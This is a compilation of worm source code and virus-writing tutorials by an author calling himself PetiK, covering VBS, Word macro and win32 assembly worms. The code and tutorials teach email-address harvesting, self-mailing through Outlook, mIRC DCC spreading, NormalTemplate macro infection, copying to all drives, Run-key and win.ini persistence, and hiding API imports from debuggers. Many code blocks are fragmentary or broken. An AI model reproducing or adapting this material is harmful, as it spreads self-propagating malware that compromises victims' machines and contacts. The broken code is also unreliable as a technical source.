Function WormM(dir)
If Dir = "" Then
If fso.FileExists("C:\mirc\mirc.ini") then dir="C:\mirc
If fso.FileExists("C:\mirc32\mirc.ini") then dir="C:\mirc32
If fso.FileExists(pogfile&"\mirc\mirc.ini") then dir=pogfile&"\mirc\mirc.ini"
If fso.FileExists(pogfile&"\mirc32\mirc.ini") then dir=pogfile&"\mirc32\mirc.ini"
End If
If dir <> "" Then
Set mirc=fso.CreateTextFile(dir&"\script.ini", True)
mirc.WriteLine "[scipt]"
mirc.WriteLine "n0=ON 1:JOIN:#:{ ( $nick == $me ) { halt }"
mirc.WriteLine "n1 = /dcc send $nick " &sys&"\Plg_PTK\Important.vbs"
mirc.WriteLine "n2=}"
mirc.Close
End If
End Function
Function Mail(dossier)
If not fso.FileExists(sys&"\Plg_PTK\Info.txt") Then
Set DF=fso.CreateTextFile(sys&"\Plg_PTK\Info.txt")
DF.WriteLine "Files Found By VBS.GoodBye.Worm :"
DF.WriteBlankLines(1)
DF.Close
End If
If fso.FolderExists(dossier) Then
For Each File in fso.GetFolder(dossier).Files
ext=fso.GetExtensionName(File.Name)
If (ext="htm") or (ext="html") or (ext="php") or (ext="htt") Then
Set see = fso.OpenTextFile(File.path, 1)
liretout = see.ReadAll
For i = 1 to len(liretout)
mailto = mid(liretout,i,7)
If mailto = "mailto:" Then
msgbox mailto,vbinformation,File.path
Exit For
else
End If
Next
see.Close
Set DF = fso.OpenTextFile(sys&"\Plg_PTK\Info.txt", 8, True)
DF.WriteLine date& " " &time& " => " &File.path
DF.Close
End If
Next
End If
End Function
INFO.TXT
Files Found By VBS.GoodBye.Worm :
28.11.01 18:40:22 => C:\WINDOWS\WinHelp.htm

28.11.01 18:40:22 => C:\WINDOWS\hrecmd.html
28.11.01 18:40:22 => C:\WINDOWS\hobby.html
28.11.01 18:40:22 => C:\WINDOWS\hhobby.html
28.11.01 18:40:22 => C:\WINDOWS\htalent.html
28.11.01 18:40:26 => C:\WINDOWS\TEMP\RND130.htm
28.11.01 19:00:35 => C:\Eigene Dateien\WinHelp.htm
28.11.01 19:00:36 => C:\Eigene Dateien\hrecmd.html
28.11.01 19:00:38 => C:\Eigene Dateien\hobby.html
28.11.01 19:00:38 => C:\Eigene Dateien\hhobby.html
28.11.01 19:00:39 => C:\Eigene Dateien\htalent.html
28.11.01 19:04:24 => C:\Eigene Dateien\INC Fichier.doc
28.11.01 19:04:25 => C:\Eigene Dateien\INTERNETAPI.doc
28.11.01 19:04:25 => C:\Eigene Dateien\VBSStarmania.doc
28.11.01 19:04:25 => C:\Eigene Dateien\SevenSource.doc
28.11.01 19:04:31 => C:\Eigene Dateien\INCFile.doc
'VBS.Cachemire
'On error resume next
fs="FileSystemObject"
sc="Scripting"
wsc="WScript"
sh="Shell"
crlf=Chr(13)&Chr(10)
Set fso=CreateObject(sc & "." & fs)
Set ws=CreateObject(wsc & "." & sh)
desk=ws.SpecialFolders("Desktop")
strp=ws.SpecialFolders("StartUp")
Set fl=fso.OpenTextFile(WScript.ScriptFullName,1)
wrm=fl.ReadAll
fl.Close
If WScript.ScriptFullName <> sys&"\MsBackup.vbs" Then

MsgBox "Sorry but the file """ & WScript.ScriptName & """ is not a valid VBS
file",vbcritical,"ALERT"
'fso.GetFile(WScript.ScriptFullName).Copy(sys&"\MsBackup.vbs")
'ws.RegWrite
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MsBackup",sys&"\MsBackup.vbs"
Else
End If
comment $
Name : I-Worm.Lauli
Author : PetiK
Date : 7th June 2002 -
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
include useful.inc
st_worm:push 50
mov esi,offset org_wrm
push esi
push 0
mov edi,offset cpy_wrm

push edi
push 50
push edi
add edi,eax
mov eax,"WsM\"
stosd
mov eax,"kcos"
stosd
mov eax,"exe."
stosd
pop edi
;cop: push 0
; push edi
; push esi
; api CopyFileA
;reg: push 50
; push edi
; push 1
; @pushsz "Wsock32"
; @pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
; push 80000002h
; api SHSetValueA
push 0
push 80h
push 3
push 0
push 1
push 80000000h
@pushsz "code.txt" ;push offset org_wrm
inc eax
je end_cr_vbs
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 2
push eax
push ebx
test eax,eax
je end_vbs1
xchg eax,ebp
push 40h
@pushsz "OK"
@pushsz "OK"
push 0
api MessageBoxA
xor eax,eax
push eax
push eax
push eax
push 4
push ebp
api MapViewOfFile
test eax,eax
je end_vbs2
push 0
push ebx
api GetFileSize
mov [size],eax
chk_byte:
mov edi,offset hex
push edi
p_c: lodsb
call convert
stosb
dec size
cmp size,0
jnz p_c
pop edi
push 40h
@pushsz "Hex String:"
push edi
push 0
api MessageBoxA
end_vbs3:
push esi
api UnmapViewOfFile
end_vbs2:
push ebp
api CloseHandle
end_vbs1:
push ebx
api CloseHandle
end_cr_vbs:
end_worm:
push 0
api ExitProcess
convert:
push ecx
push edi
xor ecx,ecx
mov cl,al
push ecx
shr cl,4
lea edi,hex_table
inc cl
@@y:
inc edi
dec cl
jnz @@y
dec edi
mov al, byte ptr [edi]
pop ecx
and cl,0Fh
lea edi,hex_table
inc cl
@@x:
inc edi
dec cl
jnz @@x
dec edi
mov ah,byte ptr [edi]
pop edi
pop ecx
ret
.data
cpy_wrm db 50 dup (0)
org_wrm db 50 dup (0)
size dd ?
hex_table db "012345789ABCDEF",0
hex db 5000 dup (?)
end st_worm
end
Private Declare Function GetUserName Lib "advapi32.dll" Alias "GetUserNameA" (ByVal
lpBuffer As String, nSize As Long) As Long
Sub AutoOpen()
Call FuckProtection
Call InfectWord
Call CreateEML
End Sub
Sub InfectWord()
Set nor = NormalTemplate.VBProject.VBComponents
Set doc = ActiveDocument.VBProject.VBComponents
srcvir = "C:\calli.drv"
If nor.Item("Calli").Name <> "Calli" Then
doc("Calli").Export srcvir
nor.Import srcvir
End If
If doc.Item("Calli").Name <> "Calli" Then
nor("Calli").Export srcvir
doc.Import srcvir
ActiveDocument.Save
End If
Kill (srcvir)
End Sub
Sub FuckProtection()
With Options
End With
Case "10.0"
Case "9.0"
End Select
End Sub
Sub CreateEML()
Dim strUserName As String

strUserName = String(100, Chr$(0))
GetUserName strUserName, 100
strUserName = Left$(strUserName, InStr(strUserName, Chr$(0)) - 1)
bound = ""
For i = 1 To 17
Randomize (Timer)
bound = bound + Chr(Int(Rnd(1) * 8) + 48)
Next
eml1 = "To: """ & strUserName & "@microsoft.com""" & vbCrLf & _
"Subject: Hello You..." & vbCrLf & _
"Date: " & Hour(Now) & ":" & Minute(Now) & ":" & Second(Now) & " +0200" & vbCrLf
& _
"MIME-Version: 1.0" & vbCrLf & _
"Content-Type: multipart/mixed;" & vbCrLf & _
vbTab & "boundary = ""----=_NextPart_" & bound & """" & vbCrLf & _
"X-Priority: 3" & vbCrLf & _
"X -MSMail - Priority: Normal" & vbCrLf & _
"X-Unsent: 1" & vbCrLf & _
"X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000" & vbCrLf & vbCrLf & _
"This is a multi-part message in MIME format." & vbCrLf & vbCrLf
eml2 = "------=_NextPart_" & bound & vbCrLf & _

"Content-Type: text/plain;" & vbCrLf & _
vbTab & "Charset=""iso-8859-1""" & vbCrLf & _
"Content-Transfer-Encoding: 7bit" & vbCrLf & vbCrLf & _
"Hello my friend, this is a funny file for you" & vbCrLf & vbCrLf & _
vbTab & vbTab & "Best Regards" & vbCrLf & vbCrLf & vbCrLf
eml3 = "------=_NextPart_" & bound & vbCrLf & _

"Content-Type: application/x-msdownload;" & vbCrLf & _
vbTab & "name = ""Only_For_You.doc""" & vbCrLf & _
"Content -Transfer - Encoding: base64" & vbCrLf & _
"Content-Disposition: attachment;" & vbCrLf & _
vbTab & "fileName = ""Only_For_You.doc""" & vbCrLf & vbCrLf
eml4 = EncodeBase64(ActiveDocument.FullName)
eml5 = vbCrLf & "------=_NextPart_" & bound
Open "hello.eml" For Output As #1

Print #1, eml1 & eml2 & eml3 & eml4 & eml5
Close #1
End Sub
Private Function EncodeBase64(ByVal vsFullPathname As String) As String
Dim b As Integer
Dim Base64Tab As Variant
Dim bin(3) As Byte
Dim s As String
Dim l As Long
Dim i As Long
Dim FileIn As Long
Dim sResult As String
Dim n As Long
Base64Tab = Array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M",
"N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "a", "b", "c", "d", "e",
"f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w",
"x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "+", "/")
Erase bin
l = 0: i = 0: FileIn = 0: b = 0:
s = ""
FileIn = FreeFile
Open vsFullPathname For Binary As FileIn
sResult = s & vbCrLf

s = ""
l = LOF(FileIn) - (LOF(FileIn) Mod 3)

For i = 1 To l Step 3
Get FileIn, , bin(0)

If Len(s) > 72 Then
s = s & vbCrLf
sResult = sResult & s
s = ""
End If
b = (bin(n) \ 4) And &H3F

s = s & Base64Tab(b)
b = ((bin(n) And &H3) * 16) Or ((bin(1) \ 16) And &HF)

b = ((bin(n + 1) And &HF) * 4) Or ((bin(2) \ 64) And &H3)

b = bin(n + 2) And &H3F

Next i
If Not (LOF(FileIn) Mod 3 = 0) Then
For i = 1 To (LOF(FileIn) Mod 3)

Get FileIn, , bin(i - 1)
Next i
If (LOF(FileIn) Mod 3) = 2 Then

b = (bin(0) \ 4) And &H3F
b = ((bin(0) And &H3) * 16) Or ((bin(1) \ 16) And &HF)

b = ((bin(1) And &HF) * 4) Or ((bin(2) \ 64) And &H3)

s = s & "="
Else
b = (bin(0) \ 4) And &H3F
b = ((bin(0) And &H3) * 16) Or ((bin(1) \ 16) And &HF)

s = s & "=="
End If
End If
If s <> "" Then

s = s & vbCrLf
sResult = sResult & s
End If
s = ""
Close FileIn
EncodeBase64 = sResult
End Function
comment *
Name : I-Worm.DieWorm
Author : PetiK
Date : July 10th 2002
Language : win32asm
*
.586p
.model flat
.code
JUMPS
include useful.inc
api macro a
extrn a:proc
call a
endm
start:
get_name:
push 50
push esi
push 0
get_copy_name:
push edi
push 50
push edi
add edi,eax
mov eax,'acs\'
stosd
mov eax,'renn'
stosd
mov eax,'exe.'
stosd
pop edi
copy_worm:
; push 0
; push edi
; push esi
; api CopyFileA
; push 50
; push edi
; push 1
; @pushsz "ScanW32"
; @pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
; push 80000002h
; api SHSetValueA
push 0
push 0
push 3
push 0
push 1
push 80000000h
push offset orgwrm
api CreateFileA
inc eax
je end_worm
dec eax
xchg ebx,eax
push 0
push 0
push 0
push 2
push 0
push ebx
test eax,eax
je end_w1
xchg eax,ebp
push 0
push 0
push 0
push 4
push ebp
api MapViewOfFile
test eax,eax
je end_w2
xchg eax,esi
push 0
push ebx
api GetFileSize
mov [size],eax
push 40h
@pushsz "Hello"
@pushsz "Hello"
push 0
api MessageBoxA
push 0
push 80h
push 2
push 0
push 1
push 40000000h
@pushsz "essai.txt"
api CreateFileA
mov [hvba],eax
@start_hex:
mov cnt,0
mov edi,offset dochex
push edi
@pushsz "e = e & """

push offset dochex
api lstrcat
pop edi
push 0
push offset byte
push 112
push offset dochex
push [hvba]
api WriteFile
push [hvba]
api CloseHandle
f_hex:
end_w3: push esi
api UnmapViewOfFile
end_w2: push ebp
api CloseHandle
end_w1: push ebx
api CloseHandle
end_worm:
push 0
api ExitProcess
conv_hex:
PUSH ECX
PUSH EDI
XOR ECX, ECX

MOV CL, AL
PUSH ECX
SHR CL, 04h
LEA EDI, Tab_Hex
INC CL
@@Y:
INC EDI
DEC CL
JNZ @@Y
DEC EDI
MOV AL, BYTE PTR [EDI]
POP ECX
AND CL, 0Fh
LEA EDI, Tab_Hex
INC CL
@@X:
INC EDI
DEC CL
JNZ @@X
DEC EDI
MOV AH, BYTE PTR [EDI]
POP EDI
POP ECX
RET
.data
dochex db 112 dup (0)
hfile dd ?
hvba dd ?
byte dd 0
size dd ?
cnt dd ?
Tab_Hex db "0123456789ABCDEF", 00h
ends
end start
=== How to spread a worm ? ===
=== by PetiK (09/17/2001) ===
###################
#FIND SOME ADDRESS#
###################
The most difficult to spread a worm is to find some address.
There are in the computer, a lot of file which stock address.
*.WAB file (Windows AddressBook):
---------------------------------
We can find this sort of file in the default value of
HKEY_CURRENT_USER\Software\Microsoft\Wab\WAB4\Wab File Name.
Look at the source of Win32.HiV coded by Benny to examine the mechanism.
For this sort of file, I use an other technic. I create in the C:\
a vbs file. This vbs file will search all email in the Oultook Address Book
and save them in a file in the WINDOWS or SYSTEM folder. This file afterwards
is scanned by the worm (look at the source of I-Worm.Passion or I-Worm.Rush).
*.HTM, *.HTML (Internet files):

-------------------------------
Windows is full of this sort of file but the problem is that they don't contain
a lot of address. The solution is to scan all *.HTM and *.HTML files in the
MSIE Cache Directory. We can use the api SHGetSpecialFolderPathA in the DLL file
SHELL32.dll (20h). We can use regedit too. The address is the following :
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache.
*.EML file (Outlook Express file):

----------------------------------
We can found some address in a email ready to send.
*This is the start of a eml file (Outlook Express)
From: "PetiKVX" <petikvx@multimania.com>
To: <victim@multimania.com> <= We have our address
Subject: Virus Spread
Date: Sun, 16 Sep 2001 20:54:11 +0200
MIME-Version: 1.0
To take this address, we search the string "To: <" in *.eml and we take the address
#################
#SPREAD THE WORM#
#################
I have imagined something to insert a virus/worm/trojan in a mail which contain already
an attachment. We're going to use *.eml file again
This is the appearance of a EML file :

From: "PetiKVX" <petikvx@multimania.com>
To: <victim@multimania.com>
Subject: Virus Spread
Date: Sun, 16 Sep 2001 20:54:11 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0008_01C13EF1.BF420560" <= The string of the
"boundary"
------=_NextPart_001_0009_01C13EF1.BF420560
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
This is a new virus <= This is the body of mail

<= We can add something (text, script ??)
------=_NextPart_000_0008_01C13EF1.BF420560
Content-Type: application/x-msdownload;
name="Winpopup.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="Winpopup.exe" <= This is a first attachment
HGiAAAAAAAaACgAAAAAA5gUNADAcP4AAAAAA8wUFADAcQIAAAAAA+AUzADAcQoAAAAAAKwZpADAc
Q4AAAAAAlAYLADAcRIAAAAAAnwYJADAcvIAAAAAAqAYLADAcFIEAAAAAswYEADAcFYEAAAAAtwYF
ADAcFoEAAAAAvAYDADAcZYAAAAAACYABAAAAAAC/BgMAMAzcgAAAAAAKgAEAAAAAAMIGAQAwHKoB
AAAAABCAAQAAAAAAwwYfADAMAYAAAAAAA4AGAAAAAACMBC8AEBwBgAAAAAC7BBMAEBwCgAAAAADR
------=_NextPart_000_0008_01C13EF1.BF420560 <= Delete "--" at the end of the string

Content-Type: application/x-msdownload; \
name="virus.exe" |
Content-Transfer-Encoding: base64 |<= This our virus that we want attached.
Content-Disposition: attachment; |<= The file is of course encode with the
filename="virus.exe" |<= Encode64 system.
---------------------------------
TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|
AAAAAAEAALoQAA4ftAnNIbgBTM0hkJBUaGlzIHByb2dyYW0gbXVzdCBiZSBydW4gdW5kZXIgV2lu|
MzINCiQ3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|
|--------------------------------
|
------=_NextPart_000_0008_01C13EF1.BF420560-- /
To attached a file with this way, we must read the "boundary". Here it is the string
"----=_NextPart_000_0008_01C13EF1.BF420560".
We must delete "--" after the last "boundary" before infection.
Like this the mail will contain the second attached
Warning !!
We must add "--" before and AFTER the LAST "boundary" to mark the end of the mail.
There we are !
If you have suggest, please mail me to petikvx@multimania.com.
You can visit my siteweb : http://www.petikvx.fr.fm
=== Some Practice Technics ===
== by PetiK (02/10/2002) ===
###############
#Introduction:#
###############
This article presents some technics that I use for my worm. I don't code
very well like other coderz (Benny, GriYO, Bumblebee ,etc...) but I want
to show what I know to do. Each part will be accompagny of a code source.
Summary: I:Hide a copy of worm
II:Spread a worm into different drives
III:Extract API from KERNEL32.DLL library
########################
#I:Hide a copy of worm:#
########################
When I read a new description of worm, I note that he uses a static name
like services.exe (XTC), winmine.exe (Chainsaw), wsock2.dll (Icecubes).
It's practice because of the name but to delete the worm it's practice too.
So my idea was to change in each start the name of the worm. How ?? Easy.
First: create a random name into %windir% or %sysdir% directory :
push 50
push esi
push 0
push edi
push 50
push edi
add edi,eax
mov al,"\"
stosb
api GetTickCount \ Thanx to Benny for this
push 9 |
pop ecx |
xor edx,edx |
div ecx |
inc edx |
mov ecx,edx |
copy_g: |
push ecx |
api GetTickCount |
push 'z'-'a' |
pop ecx |
xor edx,edx \
div ecx ---- Example of random name:
xchg eax,edx / jwvv.exe, abgqlbg.exe, slb.exe
add al,'a' |
stosb |
api GetTickCount |
push 100 |
pop ecx |
xor edx,edx |
div ecx |
push edx |
api Sleep | If we don't sleep the name look like:
pop ecx | ggggggg.exe, hhhhhhhh.exe uuuuuuu.exe
loop copy_g |
mov eax,"exe." |
stosd |
pop edi /
Second: Put the original name into Wininit.ini to delete him in the next start:
@pushsz "C:\WINDOWS\WININIT.INI" \
push offset orig_name | [rename]
@pushsz "NUL" >--- NUL=orig_name
@pushsz "rename" |
api WritePrivateProfileStringA /
Third: Copy of the worm:
push 0
push edi ; copy name
push esi ; original name
api CopyFileA
Fourth: Register the name into Win.ini to active him in the next start:
push edi ; copy name
@pushsz "RUN"
@pushsz "WINDOWS"
api WriteProfileStringA
-----------------------source-----------------------
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
include Useful.inc
start_worm:
push 50
push esi
push 0
push edi
push 50
push edi
add edi,eax
mov al,"\"
stosb
api GetTickCount
push 9
pop ecx
xor edx,edx
div ecx
inc edx
mov ecx,edx
copy_g:
push ecx
api GetTickCount
push 'z'-'a'
pop ecx
xor edx,edx
div ecx
xchg eax,edx
add al,'a'
stosb
api GetTickCount
push 100
pop ecx
xor edx,edx
div ecx
push edx
api Sleep
pop ecx
loop copy_g
mov eax,"exe."
stosd
pop edi
push 40h
push edi
push 0
api MessageBoxA
push 50
push offset wininit
@pushsz "\WININIT.INI"
push offset wininit
api lstrcat
push offset wininit
push esi
@pushsz "NUL"
@pushsz "rename"
copy_w: push 0
push edi
push esi
api CopyFileA
run_w: push edi
@pushsz "RUN"
@pushsz "WINDOWS"
api WriteProfileStringA
end_worm:
push 0
api ExitProcess
.data
wininit db 50 dup (0)
end start_worm
end
-----------------------source-----------------------
########################################
#II:Spread a worm into different drives#
########################################
One copy good is, many copies better are. In fact, we can create a sort of "backup"
of the worm into different drives of the system.
It's easy to code this (too easy perhaps).
start_worm:
push 50
mov esi,offset orig_worm ; Take the name of the worm
push esi
push 0
spread_system:
call @lect
db "D:\",0 ; The differents drives. We don't
db "E:\",0 ; use A,B because it's certainly
...... ; floopy drive.
db "Y:\",0
db "Z:\",0
@lect:
pop esi
push 23 ; Number of drives 26-3=23
pop ecx
loop_lect:
push ecx
push esi
; test eax,eax
; jnz continue_spread
push 0
@pushsz "winbackup.exe" ; name of copy
api CopyFileA
;continue_spread:
@endsz
pop ecx
loop loop_lect
end_spread_system:
-----------------------source-----------------------
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
include Useful.inc
start_worm:
push 50
push esi
push 0
spread_system:
call @lect
db "D:\",0
db "E:\",0
db "F:\",0
db "G:\",0
db "H:\",0
db "I:\",0
db "J:\",0
db "K:\",0
db "L:\",0
db "M:\",0
db "N:\",0
db "O:\",0
db "P:\",0
db "Q:\",0
db "R:\",0
db "S:\",0
db "T:\",0
db "U:\",0
db "V:\",0
db "W:\",0
db "X:\",0
db "Y:\",0
db "Z:\",0
@lect:
pop esi
push 23
pop ecx
loop_lect:
push ecx
push esi
push 0
@pushsz "winbackup.exe"
api CopyFileA
@endsz
pop ecx
loop loop_lect
end_spread_system:
end_worm:
push 0
api ExitProcess
.data
lect db 50 dup (0)
end start_worm
end
-----------------------source-----------------------
###########################################
#III:Extract API from KERNEL32.DLL library#
###########################################
A lot of disassembler/debugger (like W32DASM) can find the APIs used by a program.
And a worm/virs/trojan is a program.
With normal program : "extrn API:proc" Import functions of W32DASM show
KERNEL32.CloseHandle
KERNEL32.CreateFileA
KERNEL32.GetModuleHandleA
KERNEL32.GetProcAddress
KERNEL32.WriteFile
A user who debug the program can to doubt that the program Create or open a file to write
something. We can hide KERNEL32.CloseHandle
KERNEL32.CreateFileA and
KERNEL32.WriteFile.
How ?? While exctracting APIs from KERNEL32.DLL
code section
------------
First: Open KERNEL32.DLL:
xchg eax,ebx
Second: Use a macro to take the address of APIs:
kern macro x
push offset sz&x
push ebx
api GetProcAddress
mov _ptk&x,eax
endm
Third: Extract the different APIs:
kern CloseHandle
kern CreateFileA
kern WriteFile
Fourth: Use the APIs:

...
...
call _ptkWriteFile
data section
------------
_ptkWriteFile dd ?
If we debug the program Import functions of W32DASM show

KERNEL32.GetModuleHandleA
KERNEL32.GetProcAddress
-----------------------source-----------------------
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
include Useful.inc
start_worm:
xchg eax,ebx
kern macro x
push offset sz&x
push ebx
api GetProcAddress
mov _ptk&x,eax
endm
kern CloseHandle
kern CreateFileA
kern WriteFile
prep_spread_worm:
push 0
push 80h
push 2
push 0
push 1
push 40000000h
@pushsz "C:\KernApi.txt"
xchg eax,ebx
push 0
push offset octets
push e_txt - s_txt
push offset s_txt
push ebx
call _ptkWriteFile
push ebx
.data
octets dd ?
_ptkWriteFile dd ?
s_txt: db 'Text file create with',CRLF
db 'APIs extract from',CRLF
db 'KERNEL32.DLL library',CRLF,CRLF
db 9,'PetiK',CRLF
e_txt:
end start_worm
end
-----------------------source-----------------------
#############
#Conclusion:#
#############
If you have some questions or suggestions, please mail me to petikvx@multmania.com.

=== VBS tutorial ===
=== by PetiK (05/05/2002) ====
################
# Introducion: #
################
I wrote this article after programming VBS.Xchange and VBS.Doublet (two VBS/DOC infectors).
There are three parts in this article.
- Hex Conversion : How convert a ascii file (VBS in a module of Word for example).
- Spread with "mailto:" : spread a VBS worm with web files.
- Random Name Generator : To change in each start a new copy of a VBS worm/virii.
I succeeded to code without look at other source
This sort of aticle is of course not for good coderz but for the newbies (NOT LAMERZ) and
all people who want learn about WORM programming.
###################
# HEX CONVERSION: #
###################
Why convert a file in hexadecimal ?? For example to put it in module of a Word dosument.
How to do this ??
1) Set fso=CreateObject("Scripting.FileSystemObject")
virus=fl.ReadAll ' Read all the file
fl.Close
2) For i=1 To len(virus) ' Take the size of the file
3) e=Mid(virus,i,1) ' Take one byte after one.
e=Hex(Asc(e)) ' And convert in hexa. (P=50;e=65;...)
4) If Len(e)=1 Then ' If the hexa < 10h we add a 0
e="0"&e ' Example : return (0Dh0Ah). We will have D and A.
End If ' So we add a 0 => 0D and 0A
5) f=f+e ' This part is for the lenght of the line in the module
If Len(f)=110 Then ' of the document (don't support too long).
sp.WriteLine "e = e + """+f+"""" ' Here we put 110 character:
f="" ' e = e + "...110 char..."
End If
6) If Len(virus)-i = 0 Then ' Here is for the last line if there are less 110 char :
sp.WriteLine "e = e + """+f+"""" ' e = e + "... 1 < number of char < 110..."
f=""
End If
So the code source :
*******************************************************************************************************************
*****
virus=fl.ReadAll
fl.Close
set sp=fso.CreateTextFile("example_vbshex.txt",True,8)
sp.WriteLine "Attribute VB_Name = ""VirModule"""
sp.WriteLine "Sub AutoOpen()"
e=Mid(virus,i,1)
e=Hex(Asc(e))
If Len(e)=1 Then
e="0"&e
End If
f=f+e
If Len(f)=110 Then
f=""
End If
f=""
End If
Next
sp.WriteLine "Open ""C:\newvbsfile.vbs"" For Output As #1"
sp.WriteLine "Shell ""wscript C:\newvbsfile.vbs"""
sp.WriteLine ""
sp.WriteLine "Next"
sp.Close
*******************************************************************************************************************
*****
And this is the result:

*******************************************************************************************************************
*****
Attribute VB_Name = "VirModule"
Sub AutoOpen()
e = ""
e = e +
"4F6E204572726F7220526573756D65204E6578740D0A5365742066736F3D4372656174654F626A6563742822536372697074696E672E46"
e = e +
"696C6553797374656D4F626A65637422290D0A53657420666C3D66736F2E4F70656E5465787446696C6528575363726970742E53637269"
e = e +
"707446756C6C6E616D652C31290D0A76697275733D666C2E52656164416C6C0D0A666C2E436C6F73650D0A0D0A7365742073703D66736F"
e = e +
"2E4372656174655465787446696C6528226578616D706C655F7662736865782E747874222C547275652C38290D0A73702E57726974654C"
e = e +
"696E6520224174747269627574652056425F4E616D65203D2022225669724D6F64756C652222220D0A73702E57726974654C696E652022"
e = e +
"537562204175746F4F70656E2829220D0A73702E57726974654C696E6520224F6E204572726F7220526573756D65204E657874220D0A73"
e = e +
"702E57726974654C696E65202265203D2022222222220D0A0D0A466F7220693D3120546F206C656E287669727573290D0A0D0A653D4D69"
e = e +
"642876697275732C692C31290D0A653D48657828417363286529290D0A0D0A4966204C656E2865293D31205468656E0D0A653D22302226"
e = e +
"650D0A456E642049660D0A0D0A663D662B650D0A4966204C656E2866293D313130205468656E0D0A73702E57726974654C696E65202265"
e = e +
"203D2065202B202222222B662B222222220D0A663D22220D0A456E642049660D0A0D0A4966204C656E287669727573292D69203D203020"
e = e +
"5468656E0D0A73702E57726974654C696E65202265203D2065202B202222222B662B222222220D0A663D22220D0A456E642049660D0A0D"
e = e +
"0A4E6578740D0A0D0A73702E57726974654C696E652022726561643D646563286529220D0A73702E57726974654C696E6520224F70656E"
e = e +
"202222433A5C6E657776627366696C652E766273222220466F72204F7574707574204173202331220D0A73702E57726974654C696E6520"
e = e +
"225072696E742023312C2072656164220D0A73702E57726974654C696E652022436C6F7365202331220D0A73702E57726974654C696E65"
e = e +
"20225368656C6C2022227773637269707420433A5C6E657776627366696C652E7662732222220D0A73702E57726974654C696E65202245"
e = e +
"6E6420537562220D0A73702E57726974654C696E652022220D0A73702E57726974654C696E65202246756E6374696F6E20646563286F63"
e = e +
"746529220D0A73702E57726974654C696E652022466F72206865786164203D203120546F204C656E286F6374652920537465702032220D"
e = e +
"0A73702E57726974654C696E652022646563203D20646563202620436872282222266822222026204D6964286F6374652C206865786164"
e = e +
"2C20322929220D0A73702E57726974654C696E6520224E657874220D0A73702E57726974654C696E652022456E642046756E6374696F6E"
e = e + "220D0A73702E436C6F7365"
read=dec(e)
Open "C:\newvbsfile.vbs" For Output As #1
Print #1, read
Close #1
Shell "wscript C:\newvbsfile.vbs"
End Sub
Function dec(octe)
Next
End Function
*******************************************************************************************************************
*****
The function "dec" allows to convert in the opposite sense.
#########################
# SPREAD WITH "MAILTO:" #
#########################
Now we are going to see how spread a VBS worm without the Windows AddressBook (aka WAB).
If we can't use the WAB, we can read old mail and take the EMail. But too bad, I don't code this
in VBS. Last solution : take the EMail in the WEB file (htm, html, asp, etc...).
When we see a link to send an mail by clicking this is the code:

href="mailto:petikvx@aol.com">PetiKVX</A>
-------
There is always this string : "MAILTO:". So! Fine!
We can scan all file to search this string and scan the EMail.
1) if (ext="htm") or (ext="html") or (ext="htt") or (ext="asp") Then ' Take the good extension
' htm, html, asp, doc, xls
set htm=fso.OpenTextFile(fil.path,1) ' and open the file.
verif=True
allhtm=htm.ReadAll() ' Read all the file.
htm.Close
2) For ml=1 To Len(allhtm) ' Get the size.

count=0
3) If Mid(allhtm,ml,7) = "mailto:" Then ' Find the mailto: string.
counter=counter+1
mlto=""
4) Do While Mid(allhtm,ml+6+count,1) <> """" ' Scan the EMail until the '"' string.
count=count+1
loop
5) sendmailto(left(mlto,len(mlto)-1)) ' Send the mail
And now, the code:

*******************************************************************************************************************
*****
Set mel=fso.CreateTextFile("spread_mailto.txt",8,TRUE)
counter=0
lect()
mel.WriteLine "#"
mel.Close
WScript.Quit
Sub lect()
Set dr=fso.Drives
For Each d in dr
list(d.path&"\")
End If
Next
End Sub
Sub spreadmailto(dir)
Set cf=f.Files
For Each fil in cf
ext=fso.GetExtensionName(fil.path)
ext=lcase(ext)
if (ext="htm") or (ext="html") or (ext="htt") or (ext="asp") Then
set htm=fso.OpenTextFile(fil.path,1)
allhtm=htm.ReadAll()
htm.Close
For ml=1 To Len(allhtm)
count=0
If Mid(allhtm,ml,7) = "mailto:" Then
counter=counter+1
mlto=""
Do While Mid(allhtm,ml+6+count,1) <> """"
count=count+1
loop
mel.WriteLine counter &" <"&left(mlto,len(mlto)-1)&">"
msgbox mlto
sendmailto(left(mlto,len(mlto)-1))
End If
Next
End If
Next
End Sub
Sub list(dir)
Set ssf=f.SubFolders
For Each fil in ssf
spreadmailto(fil.path)
list(fil.path)
Next
End Sub
Sub sendmailto(email)
Set mailmelto=out.CreateItem(0)
mailmelto.To email
mailmelto.Subject "Subject of worm"
mailmelto.Body "Body of worm"
mailmelto.Attachment.Add (WScript.ScriptFullName)
mailmelto.DeleteAfterSubmit = True
mailmelto.Send
Set out = Nothing
End Sub
*******************************************************************************************************************
*****
In the spread_mailto.txt file we have this:
*******************************************************************************************************************
*****
1 <Petikvx@aol.com>
2 <VBS.Ketip.A@mm>
3 <PetiK@aol.com>
4 <kavdaemon@relay.avp.ru>
5 <kavdaemon@relay.avp.ru>kavdaemon@relay.avp.ru</A></TD></TR>
<TR class=aolmailheader>
